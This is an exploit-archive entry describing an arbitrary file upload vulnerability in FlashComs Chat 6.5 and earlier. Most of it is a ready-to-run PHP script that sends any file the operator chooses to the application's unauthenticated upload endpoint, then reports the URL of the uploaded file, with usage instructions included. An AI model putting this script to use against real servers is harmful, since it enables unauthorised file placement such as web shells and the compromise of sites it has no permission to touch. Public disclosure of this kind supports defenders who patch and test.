FlashComs Chat <= 6.5 - Arbitrary File Upload Vulnerability

2013-12-02T00:00:00
ID 1337DAY-ID-21600
Type zdt
Reporter Miya Chung
Modified 2013-12-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            <?php

 
$options = getopt('u:f:');
 
if(!isset($options['u'],$options['f'])) die("\nHow to use: php $_SERVER[PHP_SELF] -u URL -f FILE_TO_UPLOAD\nExample: php $_SERVER[PHP_SELF] -u www.example.com/paths -f myfile.txt\n");
 
$handle = curl_init();
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($handle, CURLOPT_URL, "http://".$options['u']."/common/server/php/file.php?action=upload");
curl_setopt($handle, CURLOPT_POSTFIELDS,array("Filedata" => "@".$options['f']."","fileId" => $options["f"]));
$result = curl_exec($handle);
 
if(strpos($result,"UPLOAD_SUCCESS")){
    echo "\n_____________________________________________________________________\n";
    echo "\t[+] Exploitation success!!\n";
    echo "\t[+] http://$options[u]/files/$options[f]\n";
    echo "_____________________________________________________________________\n";
}else{
    echo "\n[-] Target is not exploitable\n";
    preg_match('#msg="(.*?)" />#si',$result,$msg);
    echo "[-] Message: ".$msg[1]."\n";
}                              
 
?>

#  0day.today [2018-04-09]  #